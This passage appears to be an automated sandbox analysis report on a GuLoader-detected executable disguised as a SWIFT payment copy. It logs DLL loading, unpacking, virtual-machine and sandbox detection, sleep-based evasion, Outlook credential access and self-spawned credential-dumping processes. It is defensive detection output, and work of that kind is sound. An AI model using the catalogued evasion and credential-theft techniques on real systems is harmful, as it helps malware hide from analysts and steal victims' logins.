                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.cfgJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: z58Swiftcopy_MT.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeUnpacked PE file: 3.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeUnpacked PE file: 4.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeUnpacked PE file: 5.2.z58Swiftcopy_MT.bat.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Yara detected GuLoader
                  Source: Yara matchFile source: 00000002.00000002.32053389316.0000000001764000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.27693286929.00000000031B4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.27693002963.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32053389316.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.27693286929.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nsm9317.tmp, type: DROPPED
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72806 push ecx; ret 2_2_33A72819
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_0176527A push ds; retf 2_2_0176527E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_0176827A push ds; retf 2_2_0176827E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0A4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0CC
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00451D34 push eax; ret 4_2_00451D41
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00444E71 push ecx; ret 4_2_00444E81
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414060 push eax; ret 5_2_00414074
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414060 push eax; ret 5_2_0041409C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00414039 push ecx; ret 5_2_00414049
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_004164EB push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00416553 push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00416555 push 0000006Ah; retf 5_2_004165C4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004047CB
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI/Special instruction interceptor: Address: 340E6D4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI/Special instruction interceptor: Address: 19BE6D4
                  Tries to detect Any.run
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OMC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE1]?
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692878076.0000000002430000.00000004.00001000.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057198140.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXESK
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeWindow / User API: threadDelayed 3609Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeWindow / User API: threadDelayed 5385Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeWindow / User API: foregroundWindowGot 1764Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI coverage: 9.2 %
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 7704Thread sleep count: 3609 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 484Thread sleep count: 82 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 484Thread sleep time: -41000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 1212Thread sleep count: 5385 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe TID: 1212Thread sleep time: -16155000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeThread sleep count: Count: 3609 delay: -5Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405861
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040639C FindFirstFileA,FindClose,0_2_0040639C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_33A710F1
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A76580 FindFirstFileExA,2_2_33A76580
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OmC:\Program Files\Qemu-ga\qemu-ga.exe1]?
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A4B000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692878076.0000000002430000.00000004.00001000.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057198140.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PC:\Program Files\Qemu-ga\qemu-ga.exe
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27692448822.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exesk
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                  Source: z58Swiftcopy_MT.bat.exe, 00000000.00000002.27696800598.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4128
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4306
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeAPI call chain: ExitProcess graph end nodegraph_4-34116
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A72639
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A74AB4 mov eax, dword ptr fs:[00000030h]2_2_33A74AB4
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A7724E GetProcessHeap,2_2_33A7724E
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_33A72B1C
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A72639
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A760E2

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"Jump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeProcess created: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"Jump to behavior
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerGl
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagergzrkofD
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managern
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFz
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager$4<
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
